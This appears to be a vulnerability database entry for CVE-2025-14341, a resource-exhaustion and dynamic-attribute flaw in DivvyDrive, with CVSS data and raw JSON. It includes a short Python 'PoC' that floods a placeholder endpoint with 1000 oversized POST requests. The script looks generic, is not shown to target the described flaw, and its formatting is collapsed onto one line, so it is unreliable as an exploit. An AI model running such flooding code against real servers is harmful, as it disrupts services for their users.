Security Vulnerability Report
中文
CVE-2025-14341 CVSS 8.3 HIGH

CVE-2025-14341

Published: 2026-05-07 14:16:01
Last Modified: 2026-05-07 14:42:56

Description

Improperly controlled modification of Dynamically-Determined object attributes, Allocation of resources without limits or throttling vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Excessive Allocation, Flooding. This issue affects DivvyDrive: from 4.8.2.19 before 4.8.3.2.

CVSS Details

CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H

Configurations (Affected Products)

No configuration data available.

DivvyDrive 4.8.2.19
DivvyDrive 4.8.2.20
DivvyDrive 4.8.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def trigger_vuln(target_url): # Iterate to simulate resource exhaustion/flooding for i in range(1000): try: # Malicious payload targeting dynamic attributes payload = {'dynamic_attr': 'A'*10000} response = requests.post(target_url, data=payload) print(f"Request {i}: Status {response.status_code}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://target-divvydrive/api/endpoint" trigger_vuln(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14341", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:00.660", "lastModified": "2026-05-07T14:42:56.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improperly controlled modification of Dynamically-Determined object attributes, Allocation of resources without limits or throttling vulnerability in DivvyDrive Information Technologies Inc. DivvyDrive allows Excessive Allocation, Flooding.\n\nThis issue affects DivvyDrive: from 4.8.2.19 before 4.8.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}, {"lang": "en", "value": "CWE-915"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0182", "source": "[email protected]"}]}}